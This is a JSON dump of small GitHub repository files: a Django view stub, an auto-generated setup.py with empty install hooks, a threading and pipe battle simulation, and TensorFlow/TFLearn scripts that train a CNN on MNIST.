"max_line_length": 44,
"num_lines": 6,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/insurance/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n\ndef insurance(request):\n return render(request, 'insurance.html')\n"
},
{
"alpha_fraction": 0.6472651362419128,
"alphanum_fraction": 0.6486829519271851,
"avg_line_length": 53.475608825683594,
"blob_id": "0aa96b0937fb7e7fac46729afabef7c4ddeba555",
"content_id": "2e20618fbe4e3eea7abc938fbad7acce0169b8ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 13401,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 246,
"path": "/target/dist/capstone-django-1.0.dev0/setup.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\nclass install(_install):\n def pre_install_script(self):\n pass\n\n def post_install_script(self):\n pass\n\n def run(self):\n self.pre_install_script()\n\n _install.run(self)\n\n self.post_install_script()\n\nif __name__ == '__main__':\n setup(\n name = 'Capstone-Django',\n version = '1.0.dev0',\n description = '',\n long_description = '',\n author = '',\n author_email = '',\n license = '',\n url = '',\n scripts = [],\n packages = [\n 'capstone.capstone',\n 'capstone.diagnostic',\n 'capstone.insurance',\n 'capstone.preventative',\n 'capstone.diagnostic.migrations',\n 'capstone.insurance.migrations',\n 'capstone.models.official',\n 'capstone.models.tutorials',\n 'capstone.models.official.benchmark',\n 'capstone.models.official.mnist',\n 'capstone.models.official.modeling',\n 'capstone.models.official.nlp',\n 'capstone.models.official.r1',\n 'capstone.models.official.recommendation',\n 'capstone.models.official.staging',\n 'capstone.models.official.transformer',\n 'capstone.models.official.utils',\n 'capstone.models.official.vision',\n 'capstone.models.official.benchmark.models',\n 'capstone.models.official.modeling.activations',\n 'capstone.models.official.modeling.hyperparams',\n 'capstone.models.official.modeling.training',\n 'capstone.models.official.nlp.bert',\n 'capstone.models.official.nlp.xlnet',\n 'capstone.models.official.r1.boosted_trees',\n 'capstone.models.official.r1.resnet',\n 'capstone.models.official.r1.utils',\n 'capstone.models.official.r1.wide_deep',\n 'capstone.models.official.r1.utils.data',\n 'capstone.models.official.staging.shakespeare',\n 'capstone.models.official.transformer.model',\n 'capstone.models.official.transformer.utils',\n 'capstone.models.official.transformer.v2',\n 'capstone.models.official.utils.accelerator',\n 'capstone.models.official.utils.flags',\n 'capstone.models.official.utils.logs',\n 'capstone.models.official.utils.misc',\n 'capstone.models.official.utils.testing',\n 'capstone.models.official.vision.detection',\n 'capstone.models.official.vision.image_classification',\n 'capstone.models.official.vision.detection.configs',\n 'capstone.models.official.vision.detection.dataloader',\n 'capstone.models.official.vision.detection.evaluation',\n 'capstone.models.official.vision.detection.executor',\n 'capstone.models.official.vision.detection.modeling',\n 'capstone.models.official.vision.detection.utils',\n 'capstone.models.official.vision.detection.modeling.architecture',\n 'capstone.models.official.vision.detection.utils.object_detection',\n 'capstone.models.research.adversarial_text',\n 'capstone.models.research.autoencoder',\n 'capstone.models.research.cognitive_mapping_and_planning',\n 'capstone.models.research.cognitive_planning',\n 'capstone.models.research.cvt_text',\n 'capstone.models.research.deeplab',\n 'capstone.models.research.deep_speech',\n 'capstone.models.research.domain_adaptation',\n 'capstone.models.research.feelvos',\n 'capstone.models.research.learning_unsupervised_learning',\n 'capstone.models.research.lstm_object_detection',\n 'capstone.models.research.morph_net',\n 'capstone.models.research.object_detection',\n 'capstone.models.research.real_nvp',\n 'capstone.models.research.sentiment_analysis',\n 'capstone.models.research.slim',\n 'capstone.models.research.adversarial_logit_pairing.datasets',\n 'capstone.models.research.adversarial_text.data',\n 
'capstone.models.research.attention_ocr.python.datasets',\n 'capstone.models.research.autoencoder.autoencoder_models',\n 'capstone.models.research.build.lib.object_detection',\n 'capstone.models.research.build.lib.object_detection.anchor_generators',\n 'capstone.models.research.build.lib.object_detection.box_coders',\n 'capstone.models.research.build.lib.object_detection.builders',\n 'capstone.models.research.build.lib.object_detection.core',\n 'capstone.models.research.build.lib.object_detection.dataset_tools',\n 'capstone.models.research.build.lib.object_detection.data_decoders',\n 'capstone.models.research.build.lib.object_detection.inference',\n 'capstone.models.research.build.lib.object_detection.legacy',\n 'capstone.models.research.build.lib.object_detection.matchers',\n 'capstone.models.research.build.lib.object_detection.meta_architectures',\n 'capstone.models.research.build.lib.object_detection.metrics',\n 'capstone.models.research.build.lib.object_detection.models',\n 'capstone.models.research.build.lib.object_detection.predictors',\n 'capstone.models.research.build.lib.object_detection.protos',\n 'capstone.models.research.build.lib.object_detection.tpu_exporters',\n 'capstone.models.research.build.lib.object_detection.utils',\n 'capstone.models.research.build.lib.object_detection.models.keras_models',\n 'capstone.models.research.build.lib.object_detection.predictors.heads',\n 'capstone.models.research.build.lib.object_detection.tpu_exporters.testdata',\n 'capstone.models.research.cognitive_mapping_and_planning.cfgs',\n 'capstone.models.research.cognitive_mapping_and_planning.datasets',\n 'capstone.models.research.cognitive_mapping_and_planning.render',\n 'capstone.models.research.cognitive_mapping_and_planning.scripts',\n 'capstone.models.research.cognitive_mapping_and_planning.src',\n 'capstone.models.research.cognitive_mapping_and_planning.tfcode',\n 'capstone.models.research.cognitive_planning.envs',\n 'capstone.models.research.cognitive_planning.preprocessing',\n 'capstone.models.research.compression.entropy_coder',\n 'capstone.models.research.compression.entropy_coder.all_models',\n 'capstone.models.research.compression.entropy_coder.lib',\n 'capstone.models.research.compression.entropy_coder.model',\n 'capstone.models.research.compression.entropy_coder.progressive',\n 'capstone.models.research.cvt_text.base',\n 'capstone.models.research.cvt_text.corpus_processing',\n 'capstone.models.research.cvt_text.model',\n 'capstone.models.research.cvt_text.task_specific',\n 'capstone.models.research.cvt_text.training',\n 'capstone.models.research.cvt_text.task_specific.word_level',\n 'capstone.models.research.deeplab.core',\n 'capstone.models.research.deeplab.datasets',\n 'capstone.models.research.deeplab.deprecated',\n 'capstone.models.research.deeplab.evaluation',\n 'capstone.models.research.deeplab.utils',\n 'capstone.models.research.deep_speech.data',\n 'capstone.models.research.delf.delf',\n 'capstone.models.research.delf.delf.protos',\n 'capstone.models.research.delf.delf.python',\n 'capstone.models.research.delf.delf.python.detect_to_retrieve',\n 'capstone.models.research.delf.delf.python.examples',\n 'capstone.models.research.domain_adaptation.datasets',\n 'capstone.models.research.domain_adaptation.domain_separation',\n 'capstone.models.research.efficient-hrl.agents',\n 'capstone.models.research.efficient-hrl.context',\n 'capstone.models.research.efficient-hrl.environments',\n 'capstone.models.research.efficient-hrl.utils',\n 'capstone.models.research.feelvos.datasets',\n 
'capstone.models.research.feelvos.utils',\n 'capstone.models.research.fivo.fivo',\n 'capstone.models.research.fivo.fivo.data',\n 'capstone.models.research.fivo.fivo.models',\n 'capstone.models.research.gan.mnist',\n 'capstone.models.research.learning_unsupervised_learning.architectures',\n 'capstone.models.research.learning_unsupervised_learning.datasets',\n 'capstone.models.research.learning_unsupervised_learning.meta_objective',\n 'capstone.models.research.lstm_object_detection.builders',\n 'capstone.models.research.lstm_object_detection.inputs',\n 'capstone.models.research.lstm_object_detection.lstm',\n 'capstone.models.research.lstm_object_detection.meta_architectures',\n 'capstone.models.research.lstm_object_detection.metrics',\n 'capstone.models.research.lstm_object_detection.models',\n 'capstone.models.research.lstm_object_detection.protos',\n 'capstone.models.research.lstm_object_detection.utils',\n 'capstone.models.research.maskgan.data',\n 'capstone.models.research.maskgan.losses',\n 'capstone.models.research.maskgan.models',\n 'capstone.models.research.maskgan.model_utils',\n 'capstone.models.research.maskgan.nas_utils',\n 'capstone.models.research.maskgan.regularization',\n 'capstone.models.research.morph_net.framework',\n 'capstone.models.research.morph_net.network_regularizers',\n 'capstone.models.research.morph_net.op_regularizers',\n 'capstone.models.research.morph_net.testing',\n 'capstone.models.research.object_detection.anchor_generators',\n 'capstone.models.research.object_detection.box_coders',\n 'capstone.models.research.object_detection.builders',\n 'capstone.models.research.object_detection.core',\n 'capstone.models.research.object_detection.dataset_tools',\n 'capstone.models.research.object_detection.data_decoders',\n 'capstone.models.research.object_detection.inference',\n 'capstone.models.research.object_detection.legacy',\n 'capstone.models.research.object_detection.matchers',\n 'capstone.models.research.object_detection.meta_architectures',\n 'capstone.models.research.object_detection.metrics',\n 'capstone.models.research.object_detection.models',\n 'capstone.models.research.object_detection.predictors',\n 'capstone.models.research.object_detection.protos',\n 'capstone.models.research.object_detection.tpu_exporters',\n 'capstone.models.research.object_detection.utils',\n 'capstone.models.research.object_detection.models.keras_models',\n 'capstone.models.research.object_detection.predictors.heads',\n 'capstone.models.research.object_detection.tpu_exporters.testdata',\n 'capstone.models.research.qa_kg.model_n2nmn',\n 'capstone.models.research.qa_kg.util',\n 'capstone.models.research.sentiment_analysis.data',\n 'capstone.models.research.seq2species.protos',\n 'capstone.models.research.skip_thoughts.skip_thoughts',\n 'capstone.models.research.skip_thoughts.skip_thoughts.data',\n 'capstone.models.research.skip_thoughts.skip_thoughts.ops',\n 'capstone.models.research.slim.datasets',\n 'capstone.models.research.slim.deployment',\n 'capstone.models.research.slim.nets',\n 'capstone.models.research.slim.preprocessing',\n 'capstone.models.research.slim.nets.mobilenet',\n 'capstone.models.research.slim.nets.nasnet',\n 'capstone.models.research.syntaxnet.dragnn',\n 'capstone.models.research.syntaxnet.dragnn.config_builder',\n 'capstone.models.research.vid2depth.dataset',\n 'capstone.models.research.vid2depth.ops',\n 'capstone.models.samples.cookbook.regression',\n 'capstone.models.tutorials.embedding',\n 'capstone.models.tutorials.image',\n 
'capstone.models.tutorials.rnn',\n 'capstone.models.tutorials.image.alexnet',\n 'capstone.models.tutorials.image.cifar10',\n 'capstone.models.tutorials.image.cifar10_estimator',\n 'capstone.models.tutorials.image.mnist',\n 'capstone.models.tutorials.rnn.ptb',\n 'capstone.preventative.migrations'\n ],\n namespace_packages = [],\n py_modules = [],\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python'\n ],\n entry_points = {},\n data_files = [],\n package_data = {},\n install_requires = [],\n dependency_links = [],\n zip_safe = True,\n cmdclass = {'install': install},\n keywords = '',\n python_requires = '',\n obsoletes = [],\n )\n"
}
] | 11 |
sowely/sp5-6 | https://github.com/sowely/sp5-6 | 50ff94c8db4762cf80d373488dbf0deb643ef8b1 | 252ed947beb112238f9595cdfeaa5c1014b79e2c | b5d1f24a4be81d015c3b3a892549beda2695b1eb | refs/heads/main | 2023-05-07T11:06:44.784249 | 2021-05-28T04:09:28 | 2021-05-28T04:09:28 | 371,576,187 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.545760452747345,
"alphanum_fraction": 0.5666217803955078,
"avg_line_length": 28.32653045654297,
"blob_id": "efb53b57a146657f5719f1790d608912e5f91e88",
"content_id": "fe86f42b9b407d7c409afddc0d54449ed52a68fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1486,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 49,
"path": "/prog.py",
"repo_name": "sowely/sp5-6",
"src_encoding": "UTF-8",
"text": "from threading import Thread, Semaphore\r\nimport threading\r\nfrom multiprocessing import Pipe\r\nfrom random import randint\r\nimport os\r\nimport signal\r\nfrom time import sleep, time\r\n\r\ndef f(conn):\r\n global iters, blockChange\r\n teamName = threading.current_thread().getName()\r\n fighters = 5\r\n print(os.getpid())\r\n mutexTime = time()\r\n while fighters > 0:\r\n sleep(0.01)\r\n with blockChange:\r\n print(\"time when iters changes:\", time() - mutexTime)\r\n iters += 1\r\n sleep(1)\r\n print(teamName,\"has\", fighters,\"fighters\")\r\n inc = randint(0, 9)\r\n fighters += inc\r\n print(teamName, \"+\", inc, \"=\", fighters)\r\n dec = randint(0, 9)\r\n conn.send(dec)\r\n print(teamName,\"SEND dec\", dec)\r\n sleep(1) #sleep\r\n dec = conn.recv()\r\n print(teamName,\"RECV dec\", dec)\r\n fighters -= dec\r\n if fighters < 0:\r\n fighters = 0\r\n print(fighters, \"fighters in the\", teamName,\"--------\")\r\n sleep(1)\r\n if fighters == 0:\r\n print(\"LOOSER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\", teamName) #, threading.get_ident())\r\n print(iters // 2,\"iterations\")\r\n os.kill(os.getpid(), signal.SIGTERM) # or signal.SIGKILL\r\n\r\nconn1, conn2 = Pipe()\r\np1 = Thread(target=f, args=(conn1,), name=\"TEAM1\", daemon=True)\r\np2 = Thread(target=f, args=(conn2,), name=\"TEAM2\", daemon=True)\r\nblockChange = Semaphore(value=1)\r\niters = 0\r\np1.start()\r\np2.start()\r\np1.join()\r\np2.join()\r\n"
}
] | 1 |
shanmukha-MaiL/CNN | https://github.com/shanmukha-MaiL/CNN | db179c306f9381958598a25cc7f936f4369c566d | b29448b8b8e93eb77106f1b7552c88b4b5c91e30 | 6d442f01b03a123fef40d56eed7a4c9f8de38431 | refs/heads/master | 2020-03-17T20:40:41.582843 | 2018-05-18T08:04:56 | 2018-05-18T08:04:56 | 133,923,207 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8135592937469482,
"alphanum_fraction": 0.8135592937469482,
"avg_line_length": 28.5,
"blob_id": "cb6c91eee5171340c7983031d805e9fd91244a50",
"content_id": "32c7e9ca1566976168f516034c6deb5f73bfd18c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "# CNN\nTraining MNIST data on Convolutional Neural Network.\n"
},
{
"alpha_fraction": 0.6408345699310303,
"alphanum_fraction": 0.6686537265777588,
"avg_line_length": 43.44444274902344,
"blob_id": "48930b747290d454416c752f59f6eb0a58adc538",
"content_id": "20acacc69d0199a41c82e38d8a48f7e2089e329d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2013,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 45,
"path": "/cnn_mnist.py",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets('/tmp/data/',one_hot=True)\n\nn_classes = 10\nbatch_size = 128\ntot_epochs = 10\n\nx = tf.placeholder('float',[None,784])\ny = tf.placeholder('float')\ndrop_rate = 0.4\n\ndef convolutional_neural_network(x):\n x = tf.reshape(x,[-1,28,28,1])\n \n con_l1 = tf.layers.conv2d(inputs=x,filters=32,kernel_size=5,padding='same',activation=tf.nn.relu)\n pool_l1 = tf.layers.max_pooling2d(inputs=con_l1,pool_size=2,strides=2,padding='same')\n con_l2 = tf.layers.conv2d(inputs=pool_l1,filters=64,kernel_size=5,padding='same',activation=tf.nn.relu)\n pool_l2 = tf.layers.max_pooling2d(inputs=con_l2,pool_size=2,strides=2,padding='same')\n pool_l2 = tf.reshape(pool_l2,[-1,7*7*64])\n dense = tf.layers.dense(inputs=pool_l2,units=1024,activation=tf.nn.relu)\n drop_out = tf.layers.dropout(inputs=dense,rate=drop_rate,training=True)\n output = tf.layers.dense(inputs=drop_out,units=10,activation=tf.nn.relu)\n return output\n\ndef neural_network_training(x):\n prediction = convolutional_neural_network(x)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction,labels=y))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n \n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(tot_epochs):\n epoch_loss = 0\n for i in range(int(mnist.train.num_examples/batch_size)):\n epoch_x,epoch_y = mnist.train.next_batch(batch_size)\n j,c = sess.run([optimizer,loss],feed_dict={x:epoch_x,y:epoch_y})\n epoch_loss += c\n print('Epoch ',epoch,' completed.Epoch loss = ',epoch_loss)\n correct = tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))\n accuracy = tf.reduce_mean(tf.cast(correct,'float'))\n print('Accuracy: ',accuracy.eval({x:mnist.test.images,y:mnist.test.labels}))\n \nneural_network_training(x) \n \n"
},
{
"alpha_fraction": 0.6878353953361511,
"alphanum_fraction": 0.7334526181221008,
"avg_line_length": 38.85714340209961,
"blob_id": "f56f991382fc6957b2ea58ff6ee31e3ab42e0000",
"content_id": "f5863eae4e83de4ea4c23df5daaa80e6fdde9aad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1118,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 28,
"path": "/cnn_mnist_tflearn.py",
"repo_name": "shanmukha-MaiL/CNN",
"src_encoding": "UTF-8",
"text": "import tflearn\nfrom tflearn.layers.conv import conv_2d,max_pool_2d\nfrom tflearn.layers.core import input_data,dropout,fully_connected\nfrom tflearn.layers.estimator import regression\nimport tflearn.datasets.mnist as mnist\nimport numpy as np\n\nx,y,test_x,test_y = mnist.load_data(one_hot=True)\nx = tflearn.reshape(x,[-1,28,28,1])\ntest_x = tflearn.reshape(test_x,[-1,28,28,1])\n\nconv_net = input_data([None,28,28,1],name='input')\n\nconv_net = conv_2d(conv_net,32,5,activation='relu')\nconv_net = max_pool_2d(conv_net,2,2)\nconv_net = conv_2d(conv_net,64,5,activation='relu')\nconv_net = max_pool_2d(conv_net,2,2)\nconv_net = fully_connected(conv_net,1024,activation='relu')\nconv_net = dropout(conv_net,0.8)\nconv_net = fully_connected(conv_net,10,activation='softmax')\nconv_net = regression(conv_net,optimizer='adam',learning_rate=0.01,loss='categorical_crossentropy',name='targets')\nmodel = tflearn.DNN(conv_net)\nmodel.fit({'input':x},{'targets':y},n_epoch=10,validation_set=({'input':test_x},{'targets':test_y}),snapshot_step=500,show_metric=True,run_id='mnist')\n\n\n\nprint(np.round(model.predict(test_x[1])))\nprint(test_y[1])\n\n\n"
}
] | 3 |